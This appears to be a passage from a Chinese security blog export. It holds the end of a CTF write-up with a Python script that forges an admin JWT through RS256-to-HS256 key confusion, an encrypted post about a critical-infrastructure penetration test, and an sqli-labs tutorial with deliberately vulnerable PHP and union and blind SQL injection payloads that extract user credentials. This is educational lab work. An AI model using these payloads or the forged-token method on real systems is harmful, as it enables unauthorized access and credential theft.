<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254083805-46.png" alt="请添加图片描述">返回提交 token<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254086176-49.png" alt="请添加图片描述"></p>
<h2 id="修改签名算法"><a href="#修改签名算法" class="headerlink" title="修改签名算法"></a>修改签名算法</h2><p>把 cookie 清空后提交用户名密码</p>
<p>得到一串 jwt</p>
<p>丢进<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254091115-52.png" alt="请添加图片描述"><br>发现是 RS256 编码(不对称式编码)</p>
<p>需要改为对称式编码</p>
<p>如 HS256</p>
<p>题目中给了 public key</p>
<p>用 PUBLIC_KEY 采用 HS256 进行加密 payload 构造 token</p>
<p>借用<a href="https://blog.csdn.net/loseheart157">大神 h0ld1rs</a>的脚本</p>
<blockquote>
<p>无签名那段脚本</p>
<p>是勉勉强强写出来的</p>
<p>这题就先用大神的脚本吧</p>
<p>我太菜了</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">## coding=GBK</span></span><br><span class="line"><span class="keyword">import</span> hmac</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line">file = <span class="built_in">open</span>(<span class="string">'publickey.pem'</span>)<span class="comment">#需要将文中的publickey下载 与脚本同目录</span></span><br><span class="line">key = file.read()</span><br><span class="line"></span><br><span class="line"><span class="comment">## Paste your header and payload here</span></span><br><span class="line">header = <span class="string">'{"typ": "JWT", "alg": "HS256"}'</span></span><br><span class="line">payload = <span class="string">'{"username": "admin", "role": "admin"}'</span></span><br><span class="line"></span><br><span class="line"><span class="comment">## Creating encoded header</span></span><br><span class="line">encodeHBytes = base64.urlsafe_b64encode(header.encode(<span class="string">"utf-8"</span>))</span><br><span class="line">encodeHeader = <span class="built_in">str</span>(encodeHBytes, <span class="string">"utf-8"</span>).rstrip(<span class="string">"="</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">## Creating encoded payload</span></span><br><span class="line">encodePBytes = base64.urlsafe_b64encode(payload.encode(<span class="string">"utf-8"</span>))</span><br><span class="line">encodePayload = <span class="built_in">str</span>(encodePBytes, <span class="string">"utf-8"</span>).rstrip(<span class="string">"="</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">## Concatenating header and payload</span></span><br><span class="line">token = (encodeHeader + <span class="string">"."</span> + encodePayload)</span><br><span class="line"></span><br><span class="line"><span class="comment">## Creating signature</span></span><br><span class="line">sig = base64.urlsafe_b64encode(hmac.new(<span class="built_in">bytes</span>(key, <span class="string">"UTF-8"</span>), token.encode(<span class="string">"utf-8"</span>), hashlib.sha256).digest()).decode(<span class="string">"UTF-8"</span>).rstrip(<span class="string">"="</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(token + <span class="string">"."</span> + sig)</span><br></pre></td></tr></table></figure>
<p>运行后把 token 返回去验证</p>
<p>成功</p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254094160-55.png" alt="请添加图片描述"><br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254096594-58.png" alt="请添加图片描述"></p>
]]></content>
<categories>
<category>web</category>
</categories>
<tags>
<tag>web</tag>
<tag>jwt</tag>
<tag>json web token</tag>
</tags>
</entry>
<entry>
<title>福清核电-关基测试</title>
<url>/2023/07/test-s1rius/</url>
<content><![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="Oh, this is an invalid password. Check and try again, please." data-whm="OOPS, these decrypted content may changed, but you can still have a look.">
<script id="hbeData" type="hbeData" data-hmacdigest="fedb83719e3f8a16f36640798b4f6d57348c9f803e8b99a82410876a0553c366">709e820b2f5bb6db36bae87ed03a646f74929f181a7d8d64b5544247bd132cbd4552cddf67f6de24830ee19681e4939e5d3b2c962a2d3926eb43be5b09c51f50a52cf9bb093e608b5b227af082f1d472cd86e5cd97c4e1c8963b87c20ced607fa01d329cdf57c6d86b251879e8c5b9b9bda6017735ce66934345ff604e1e018e5adce97c71dac7a532a7a4d738ba02387bce9ad4d0bcc4969ad1cfb7da0546c699a838dc358a8d60a6a84d7ab4f2458dae589c4fccb0a306ad86a3c610cfb0155475b416e94dd037487578f3032e7abc52333a18194cfb28189e5232cf70614fa6162117e8849b2b2866c25d58111f8f97a763ddc5fb94aaca539d08535e53ae98a9bf83effa8ec7ba833f3cad1c718bb3c759ce8c3d8299c0837c6b120a1baae6bbfd6c787c959a1c1f60f6c26d1f0e0f1386bf534989676374ddd95b1d4f5347b1294c2b040dd85ce33de36b30fcdeec6c9dc19630220e871c2115cbdf1570ad69239df7f49c8c86b725bcf92aa0d8abebd141e1c4b00e3560763d47b82c638c12df4cd9f1cca085f797915fe5258e53150b7958d535932451d2609c1e2d0099be1856cce3136ee04602957245584763b8014af3067762ddaf586fb89afa3c18a47c9cf463718544d5a4e43d358713b2764ac277c634a2e755808594674d1a173ba94b582383fa0fb1dade9d34b609f0f3fd30e923f1cae31af34bba09ae9c01b048f8792ef2bfe4d518e7717c6eaab413b04a7f4eee81f4c2ff1cfdcff90c65eb65ead2f78f48ba43ac890e90ecdd66e1f003d9a1de31093afb75cbba13b3d8a1cc38af7d1abfc922bf6562dabd9c4917b54d86e70813373a08a33e0bc44745312fdf74587dcc2413b647e9a4d01f6b4a2234b77568f220f344960fdacdd6b6225a47a7f2b2d6b5a19642973bcc7e5ceadc574220772580e264fbf5d4bfd66117cc664ee1a8da3d8f713fed9c72372557e877c296427306ec633e50e3a65d4f5dc5d9858fe60fda2807f2aff82ae8f121bd67e72fb09d9602f16c53bebb77ccc1071fb2f8843e5f8816f7c27cd401953cff68e706c56a93d6e44585f99496a6eb71f3bae3d67e5de8f7fd0a1c5c9759dd707e200029e9046fa00a4bcb742c3d68c3863a30f1b5edbce61f9aea598cfbaac8ce60ad7bdfde2819e5659f790ef2301d6b4fbbaec044bc0d4df9f4273d98532d87e17b9277eac20ca21b9e1997e77a684bb19ea5aadca7115fe79a8f79062a8efc7dda03703657d8e8eec5d476b361fb3ffb0de05d0d5cf8506719aca5f938e718fa652ca28b158aecea1174641867e824fd5a7079c243bbabc0fe0ded8e48b376ebad7884d42c8e8fd68a4726bbe6097cdd63209c0e4b21b98b77f10a68df24741d043ce7946421075ab50ef0870570547e39d1c99413caaec9aae2c9c7932a1ec5adfd3c2f65f74947a93fbedb2d02138fc0c99b0b6d99836427b8b2e268cc2d43a93d282b60daaced8370155f2d3a8c67707e3955b497d9386cb1693212a6867623012e8719cd4add766460aed6966d8b2d103a5676779ef86605ee54f3e2494611bc04e30b8bffd678b5c9cd16784c06c58a278ee1138f6c7186c0df890f2170985439370b973af29e44dd1b666c35708ebd2f35def1b48f6ca6c8b68d2543efaffa604bc2a7598f28b5b53b17bc38d3d9996711bca2259b16dd45e56aeb98ad5e24f48c57f216776fb90284b6ae6bc10b04aed39548110e680f144e2f1187355ae085505c004ce34d6fe1c1c66490a9fe15be6b08ac74cdc2de251a0b920292fc48df688454d34e4f32d05e039e99c85be846aa89f958e92da6f6a0c05fb9af0e977af2f6e478d2a83fbd0ef1c3b9f3a93719313ea17589a33c84c156be34519927b13094bf8df9285ee21217a982e50f727f5f7816590d19cd8c05d15c42447358fa0384e511ced968f0700248441705ac4db38c794b69ece38b7c2e6b96bae739c3661ed5053dbd90ec076ca3485eb1944840606b8d07e0b65f17cf47d98ff636d3b37eb378aed8d9f89456802e54f4282890cdc7f8b911ef0eca7b143fd40cc4c552273fb0bb926a2ec22eb51e705a81c67027783e3cdf8f676ad81af46457c4595a932c925841581d5a4467a98c096a59ac83bc39b312d3e82f672181f9f4c883ea6b9e60c5fa73a38aee31f9d88920a47809e6e981ca362daef39cab612601c95f9ee6f782b44996e46735d4df8591fefd0461121c3decbe8dd4906d4a823b1aea9cc60f98b47d78d15410b8442cff603120c1c72c89c5cdba85e56149631460814d07c66e03e5091fb86ccd8b9aefb4cc9db9b488f341fba676e6eac399bd2f7cd496df584cb9a33a731c8750a5cc60bd3fbae93217d3f147950e54a10361a8620688f7389475692ca5328b5bd75181310aba4fd2ae603d5d86e9b911f736937127de14a8a4e2e435a287e1171012d7b39da1b86a951326a80df48ce64943d5e1a0326d2135f36650dc3018df8b1400ba4c74a85432bdcdc3ea048ae700fc3850cb69958d0374cf969d506e4cfcdb82dbd7e010908ae4e3dc0e22b6df6df8003b734c37a38b79e349d3f62a665de36f6ee4ac0beeb636608e6a4a535f5f24d98e9c6f7f3acc103f1704e4a6000649625a3d163cbd2b2a0c237fa1eb2c11f47a4803c5ec79973280c9cc0730882c823bc3c392e11e20b3b512b8040cfb4a532511b4de502c3ad1edd6bddad9f207fee0649b80d873be51f295f7ab0c7702e8b9e6197a9c79eb48d1c5789b3360846a62cb51eca81f1d82b5c09eece504af5fcc205f61b9b6cf568df00be2b65c58c775a742a0d1de5c0955c56b1aa5c4bb6bf826ead497d2993c22d55c5b1490694ef611be02cf48b3d68b0299787a93dccd3fe62628eb5a2bfee271043f2996688fddd4833c39226ffcce40ccd0409d0e1880e3da4086dd8ac30c95f8d15361090fc0388d5aa2be8544390eec85549a2152699d84975fbbdf6be8112129dee70b566867199eae93ee553459b1684a0a858621447e0a1dea011fe77c2524a14bb3451a9edb9bd5d3dc19b62e8e426e16ae27a7908163f77c2d1b3ae635b033667e9c0344dae97b4e1f109d17673476a303e1accd69552262c5d6ec9db8509e4e4cb2b7f90c18aa59b59f092d868b20731b5b3f24a88dba45818cc649d72f3292f475de97ce5f0fb0d4169550fd1e6ae662d74a95ea3f861606b7227d5c8be068cfad3066c5384ef6813ae96bce3b7475e3d6ec02d99ecf5d41954b6676887648448e80bda65ba0726074c8bd9990004f0a465a162a31ebbf3f80cdc3eb5fd7a8ebdca552ff94071f5cf519059b527ff9ffac92149e2b6ec456fc342cbd9437053512a92925fce6530b5e36b94fc92c8c7f13708be7fa7132bf8c4a1ef5304206696b54e7f14e457422556b8e68104fae8581d95509b46cdab773e331da651250145044e46798f709ab3a160ca8aac3253172cb548b6611aed95c03d486ad820138a3ea456335349b5d699f992080ef7a964ad4ce95f6a3a6f4f1d558cd813b10d572a34e1189db2f266d7ad37ef59621f95aa35b84088939cc58633810f6ca55d08fd23cb6627dee845fb982ff7bffe734058a1c1547275a4e97c017b424d9fbc03d63abb4fa9aa360a429ee766e0ccf9d4379923028d1bc7e74e557c1655c56aff94e26a7b3d25f4c11d25d8f6efc9f5873ea2eb7ec28d6aa01f6a53340bbecc0b3eb6f3078cdd87b6317174b79bc1241cd0c6d8ccbdf8b7fb35df7e2c8ac38f928f4d9d14edfa0b397c091b1ed49ae71e6ecc0da2835a94214a93866ad1d329e1f7163af177c58ad8073ed4d90f670eb3ccccbf5cd3f1cf34055f55f0915d8dc134abf87f34cddf38aac322fcab35efc88faca44ee57cd73b8af1ea67e3a1a6335c493479236ad1d5cf57ac4c8de47ccd8bd73cc9997aff1274164526dc04070d55d6e28c3e243b229bbba51bf8db8ad2f3551d492406ce8b0c42db403bc243cc704864c0d0a658dca68fe8298ae532d99b6bfd72faca94267a8c7e16e105e6ad0a574cee99127eb59b2c8bdce63ed8048fc85046a373f8122195ffedd2f82360c3b03699eda989425d2c96acc8b7b2b8cccc0bb9a275a883936c424eab0c70b83ca1a094e28ffc4b6a9e2b50cf9e9161a4e64db6edd6473fe1aadc02e5f4316cc43a433da5c24882f2e63bba077de360db807ad974c09beb6c1ee65338346aae164e4203c69c826cd6e3657a443c1949c8c30a9ba5e1c889758880289cf42230b7fc2dea33cb7f4d1545fa230d6861ca8dbcee00e0e25adb686b62221f829c722e761aa119ad0b6837b4d653aeb93f8200575aa08da151de35ff8f1413c50aadea5ab2800f455cbc719e72ed3527f8a683db9e4ed54ac96bb9295c6a1cd8f143508c40599abba122cb0cc9cf931a4a3bad8e2c43db000c6ae5f5915dc126a805e3fb08258e275ad7ed7186f37af11f709e05dc40f1b0b4e9c0e7b5e99262f7eabce8f07e767e363a45ca93f8fdaada4751b572735d74e5b972efb54473b12bb2fc4221302d766ceaaa15cd7874ae93021bb20396a0f3ffcdd8ec8c48092687d0f7d3dbef93904621e9697e03668725d1c6b14b892d7c9defd43238a0279a63a07f032e2750062fc81a6fdaa139bbbe4e8cdccf9fae22755e10625844acb44dc7871df55415c354e05e769b73b1308356f6067bdd07a434c0986077555883a8d80e37f60a30fc6990276f2f25e385fd122aa5d6a8bbcfa2231a17419c4dc06101a885120718e771bf128234a2b02746f592ea8ec614a85b5a483c164ea03da3dfd21f2edf7c128150be6576f95b48c8bed950fd18f81fd5281965e80fbef18da4ce2ceac97863d14c0ae4c2f9503ccdad1752c4b2c02024c079cfebb0aa0bced1fc7b73a0e6ed2b9bf6aafe3fe2b4c073eefe876a9f28ee27d4eec72135370d3b7cb1ce9be3e1410c75833ecd76f732da2d0fae59604ff3e99650de3125f727d814038183690aa656d2907544f02c618b2230f0fb6c7b32f2cb571b9c6649e824966121f07732ecbaa9ba12f9a59a5c0f4fe229a4938d3d8f90addca9a1e180a844ec905fd05c623c60ab1a953d10cd84d39cb31f0b61119d25275f219c7e9b4045f0ba2e2d0cd9765a7c92544b56ca3b8c79b69f19fdeb6ee12607d1b87c380a71313011ba3ba71312d7cdfc1b5359fabbb876ae81610597aa91238bc4e7ef0c72d4beb1ed7d6b0ab47</script>
<div class="hbe hbe-content">
<div class="hbe hbe-input hbe-input-default">
<input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">
<label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">
<span class="hbe hbe-input-label-content hbe-input-label-content-default">Hey, password is required here.</span>
</label>
</div>
</div>
</div>
<script data-pjax src="/lib/hbe.js"></script><link href="/css/hbe.style.css" rel="stylesheet" type="text/css">]]></content>
<categories>
<category>内网</category>
</categories>
<tags>
<tag>内网</tag>
<tag>渗透</tag>
</tags>
</entry>
<entry>
<title>sqli-lab</title>
<url>/2023/07/sqli-lab/</url>
<content><![CDATA[<p>sql 注入就是<br>当用户输入一些本不是用户名密码的 sql 语句<br>这些语句没有被过滤<br>执行后通过回显等方式,使注入者获得了数据库的信息</p>
<blockquote>
<p>水了几天用来搞 visual studio2022 和 Windows11 所以本文略微简陋写,以后会完善<br>visual studio2022 版美化教程见<a href="https://blog.csdn.net/qq_62414126/article/details/121863518">Visual Studio 2022 界面美化教程</a>.</p>
</blockquote>
<h2 id="GET-传参"><a href="#GET-传参" class="headerlink" title="GET 传参"></a>GET 传参</h2><p>先放代码</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">//including the Mysql connect parameters.</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">"../sql-connections/sql-connect.php"</span>);</span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="comment">// take the variables</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'id'</span>]))</span><br><span class="line">{</span><br><span class="line"><span class="variable">$id</span>=<span class="variable">$_GET</span>[<span class="string">'id'</span>];</span><br><span class="line"><span class="comment">//logging the connection parameters to a file for analysis.</span></span><br><span class="line"><span class="variable">$fp</span>=<span class="title function_ invoke__">fopen</span>(<span class="string">'result.txt'</span>,<span class="string">'a'</span>);</span><br><span class="line"><span class="title function_ invoke__">fwrite</span>(<span class="variable">$fp</span>,<span class="string">'ID:'</span>.<span class="variable">$id</span>.<span class="string">"\n"</span>);</span><br><span class="line"><span class="title function_ invoke__">fclose</span>(<span class="variable">$fp</span>);</span><br><span class="line"><span class="comment">// connectivity</span></span><br><span class="line"><span class="comment">//注意get传参</span></span><br><span class="line">获取到输入的id后先打开一个result.txt然后把你上传的写入到那个文件里</span><br><span class="line">这样你再一次操作后你就可以看到你的注入语句真正注进去的是啥了</span><br><span class="line"><span class="variable">$sql</span>=<span class="string">"SELECT * FROM users WHERE id='<span class="subst">$id</span>' LIMIT 0,1"</span>;</span><br><span class="line"><span class="comment">//上面一行中$id前后的符号是关键,是注入语句闭合的符号</span></span><br><span class="line"><span class="variable">$result</span>=<span class="title function_ invoke__">mysql_query</span>(<span class="variable">$sql</span>);</span><br><span class="line"><span class="variable">$row</span> = <span class="title function_ invoke__">mysql_fetch_array</span>(<span class="variable">$result</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$row</span>)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<font size='5' color= '#99FF00'>"</span>;<span class="comment">//正确回显颜色为绿色</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'Your Login name:'</span>. <span class="variable">$row</span>[<span class="string">'username'</span>];</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br>"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'Your Password:'</span> .<span class="variable">$row</span>[<span class="string">'password'</span>];</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"</font>"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">//这是输入正确时的反馈,直接把运行结果告诉你</span></span><br><span class="line"> 但是后几关就不一样了</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<font color= "#FFFF00">'</span>;<span class="comment">//报错回显为黄色</span></span><br><span class="line"> <span class="title function_ invoke__">print_r</span>(<span class="title function_ invoke__">mysql_error</span>());</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"</font>"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">//这是输入错误时的反馈,把mysql_error反馈给你</span></span><br><span class="line"> 同样,后几关也不一样了</span><br><span class="line">}</span><br><span class="line"> <span class="keyword">else</span> { <span class="keyword">echo</span> <span class="string">"Please input the ID as parameter with numeric value"</span>;}</span><br><span class="line"><span class="comment">//这是反馈你输入为空的</span></span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><code>/* *我为了让读者能看得更清晰,我将注释符的右半部分删去,就像这句一样没有* */(你细品这句话 悖论)</code><br>我第一个注释是:注意 get 传参,前 10 关前半部分代码不变<br>第二个注释是提示读者要注意每一关的闭合方式(包裹方式)<br>在 if 后 else 前是正确回显部分 在 else 后是错误回显部分<br>这两部分是区分注入方式所需要关注的</p>
<h3 id="先讲理论"><a href="#先讲理论" class="headerlink" title="先讲理论"></a><code>先讲理论</code></h3><p>根据两部分分别是否回显判断注入方式<br>注入方式包含联合查询、布尔盲注、时间盲注、报错注入等</p>
<h4 id="传参"><a href="#传参" class="headerlink" title="传参"></a>传参</h4><p>最基础的就是?id=1’、username=admin’这类传参语句,后面的’引号是闭合方式上面有讲,他用的啥符号闭合,你就要用相同的符号来闭合你的语句,输入这类最基础的注入语句来判断是否有报错回显 回显是黄色,代码段注释里有写</p>
<h4 id="判断正确回显(绿色)的数据库中数据的列数,即本靶场回显的行数"><a href="#判断正确回显(绿色)的数据库中数据的列数,即本靶场回显的行数" class="headerlink" title="判断正确回显(绿色)的数据库中数据的列数,即本靶场回显的行数"></a>判断正确回显(绿色)的数据库中数据的列数,即本靶场回显的行数</h4><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span>’ <span class="keyword">order</span> <span class="keyword">by</span> <span class="number">1</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>这里的省略号只要不报错 就加大数字,直到报错的前一个数字,就是回显的行数</p>
<h4 id="判断回显的数据是数据库中的哪几列"><a href="#判断回显的数据是数据库中的哪几列" class="headerlink" title="判断回显的数据是数据库中的哪几列"></a>判断回显的数据是数据库中的哪几列</h4><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span>’ <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>这里的数字的最大值要等与上一步得到的那个数<br>上一步 7 报错,那行数就是 6,这一步就要 1,2,3,4,5,6–+<br>看看那几个数字出现在你屏幕上了<br>要注意要 id=一个不正确的值 如 0,-1 之类 这样联合查询之后的返回值会让 union 之后的查询语句的结果在数组的第一列,而后台 php 代码只会回显第一列的数据</p>
<h4 id="查库名"><a href="#查库名" class="headerlink" title="查库名"></a>查库名</h4><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span>’ <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(schema_name) <span class="keyword">from</span> information_schema.schemata <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>这里把查数据库的 sql 语句,替换掉出现在你屏幕上的一个数字 这里是 3 来回显在屏幕上<br>group_concat(你要查询的数据)from 所在的库 表 列<br>这里查库名即查<code>schema_name</code> 这个数据被保存在<code>information_schema.schemata</code><br>这样 回显的就是 数据库们 的名字</p>
<h4 id="查表名"><a href="#查表名" class="headerlink" title="查表名"></a>查表名</h4><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span>’ <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span>‘security’–<span class="operator">+</span></span><br></pre></td></tr></table></figure>
<p>table 表 information_schema.tables 类比上面 table_schema=‘ 库名’<br><code>这里你要猜一下</code>哪个数据库会放着你想要的数据,然后输在库名那个位置</p>
<h4 id="查列名"><a href="#查列名" class="headerlink" title="查列名"></a>查列名</h4><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span>’ <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name<span class="operator">=</span>‘users’<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>同样类比上面 column 列<br><code>这里还要猜</code> 上面回显的哪个表里有你要的数据</p>
<h4 id="提取数据"><a href="#提取数据" class="headerlink" title="提取数据"></a>提取数据</h4><p><code>激动人心的时候到了</code></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">-1</span>’ <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(concat_ws(’<span class="operator">~</span>’,username,password)) <span class="keyword">from</span> users–<span class="operator">+</span></span><br></pre></td></tr></table></figure>
<p>同样类比上面 有一处特殊 concat_ws(符号,列名,列名)<br>中间那个符号会被 concat_ws 插入到两组数据之间,就是为了方便看<br>这样就查到数据了,是不是很简单。</p>
<h4 id="limit"><a href="#limit" class="headerlink" title="limit"></a>limit</h4><p>limit 是限制那一部分显示,limitx,y 是从 x+1 开始显示 y 个</p>
<h3 id="实操"><a href="#实操" class="headerlink" title="实操"></a>实操</h3><h4 id="正错回显都有"><a href="#正错回显都有" class="headerlink" title="正错回显都有"></a>正错回显都有</h4><p>就按上面的步骤一步一步找到数据<br>security———>users——>username&password 这就是靶场数据库的层次<br>图啥的以后再补</p>
<h3 id="理论进阶"><a href="#理论进阶" class="headerlink" title="理论进阶"></a><code>理论进阶</code></h3><h4 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h4><figure class="highlight php"><table><tr><td class="code"><pre><span class="line">?id=<span class="number">1</span>’ <span class="keyword">and</span> <span class="title function_ invoke__">sleep</span> (<span class="number">5</span>)–+</span><br><span class="line">?id=<span class="number">1</span>‘ <span class="keyword">and</span> <span class="keyword">if</span>((<span class="title function_ invoke__">left</span>((select schema_name <span class="keyword">from</span> information_schema.schemata limit <span class="number">4</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)=‘s’),<span class="number">1</span>,<span class="title function_ invoke__">sleep</span>(<span class="number">3</span>))–+</span><br></pre></td></tr></table></figure>
<p>这样的句子 sleep()就是延时执行的意思,</p>
<blockquote>
<p><code>让浏览器先睡一会</code><br>当你想判断对不对的时候,你就让对的睡一会,错的继续肝,这样你就能看出来了</p>
</blockquote>
<h4 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h4><p>下面几个方法各有优缺点<br>因为能知道 sql-lab 靶场数据库的数据<br>所以刷题时我多用 left<br>实际</p>
<h6 id="substr"><a href="#substr" class="headerlink" title="substr"></a>substr</h6><p>substr(a,b,c)将 a 字段从第 b 个字符读取 c 个字符</p>
<h6 id="ascii"><a href="#ascii" class="headerlink" title="ascii"></a>ascii</h6><p>将括号中的字符转换为 acsii 码,再在最后进行值大小的判断,正确返回 1,错误返回 0</p>
<blockquote>
<p>类似于数学中的二分法</p>
<h6 id="left"><a href="#left" class="headerlink" title="left"></a>left</h6><p>left(a)从第一位开始读取 a 个字符</p>
</blockquote>
<h6 id="模糊查询-like"><a href="#模糊查询-like" class="headerlink" title="模糊查询 like"></a>模糊查询 like</h6><p>a like ‘%b%’ 判断 a 字符串里是否有 b<br>a like ‘b%’ 判断 a 开头是否有 <del>b 数</del></p>
<h6 id="regexp"><a href="#regexp" class="headerlink" title="regexp"></a>regexp</h6><p>regexp ‘a’正则表达式</p>
<blockquote>
<p>RegExp 对象表示正则表达式,它是对字符串执行模式匹配的强大工具 正则表达式通常被用来检索、替换那些符合某个模式(规则)的文本。<br>许多语言都有正则表达式<br>物理也有正则<br>所以正则是个啥(≧﹏ ≦)</p>
</blockquote>
<h3 id="实操进阶"><a href="#实操进阶" class="headerlink" title="实操进阶"></a>实操进阶</h3><h4 id="有报错回显-无正确回显"><a href="#有报错回显-无正确回显" class="headerlink" title="有报错回显 无正确回显"></a>有报错回显 无正确回显</h4><p>也就是说你在前四关能看见的绿字在 5-8 关用 you are in 替换了<br>也就是你之前查的库名 表名 列名 和数据不会回显了<br>当使用布尔盲注时 如果判断正确就会显示 you are in<br>不正确的话就会报错<br>下图是第五关第一个用户名 最后一步注入语句<br>之前步骤参考第 1 到 4 关查各类信息的语句并用布尔盲注所用函数包装<img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center.png" alt="在这里插入图片描述"></p>
<h4 id="正确回显和报错回显都没有"><a href="#正确回显和报错回显都没有" class="headerlink" title="正确回显和报错回显都没有"></a>正确回显和报错回显都没有</h4><p>不论你输入啥,他都会说 you are in</p>
<blockquote>
<p>就像你说 <code>啊对对对</code></p>
</blockquote>
<p>这样 布尔盲注也没法用了<br>你不知道注入语句是对是错<br>这时就要用时间盲注了<br>把布尔盲注再进行包装<br>if(布尔盲注语句,sleep(3),1)<br>正确的话,浏览器会延时 3 秒再运行<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254135027-77.png" alt="在这里插入图片描述"></p>
<h2 id="POST-传参"><a href="#POST-传参" class="headerlink" title="POST 传参"></a>POST 传参</h2><h3 id="先讲理论-1"><a href="#先讲理论-1" class="headerlink" title="先讲理论"></a><code>先讲理论</code></h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"><!--Form to post the data for sql injections Error based SQL Injection--></span><br><span class="line"><form action="" name="form1" method="post"></span><br><span class="line"> <div style="margin-top:15px; height:30px;">Username : &nbsp;&nbsp;&nbsp;</span><br><span class="line"> <input type="text" name="uname" value=""/></span><br><span class="line"> </div></span><br><span class="line"> <div> Password : &nbsp;&nbsp;&nbsp;</span><br><span class="line"> <input type="text" name="passwd" value=""/></span><br><span class="line"> </div></br></span><br><span class="line"> <div style=" margin-top:9px;margin-left:90px;"></span><br><span class="line"> <input type="submit" name="submit" value="Submit" /></span><br><span class="line"> </div></span><br><span class="line"></form></span><br><span class="line"> `上面是前端 通过post传参uname和passwd`</span><br><span class="line"><?php</span><br><span class="line">// take the variables</span><br><span class="line">if(isset($_POST['uname']) && isset($_POST['passwd']))</span><br><span class="line">{</span><br><span class="line"> $uname=$_POST['uname'];</span><br><span class="line"> $passwd=$_POST['passwd'];</span><br><span class="line">/后端接收前端传的参数</span><br><span class="line"> //logging the connection parameters to a file for analysis.</span><br><span class="line"> $fp=fopen('result.txt','a');</span><br><span class="line"> fwrite($fp,'User Name:'.$uname);</span><br><span class="line"> fwrite($fp,'Password:'.$passwd."\n");</span><br><span class="line"> fclose($fp);</span><br><span class="line">// connectivity</span><br><span class="line"> @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";</span><br><span class="line"> $result=mysql_query($sql);</span><br><span class="line"> $row = mysql_fetch_array($result);</span><br><span class="line"></span><br><span class="line"> if($row)</span><br><span class="line"> {</span><br><span class="line"> //echo '<font color= "#0000ff">';</span><br><span class="line"> echo "<br>";</span><br><span class="line"> echo '<font color= "#FFFF00" font size = 4>';</span><br><span class="line"> //echo " You Have successfully logged in\n\n " ;</span><br><span class="line"> echo 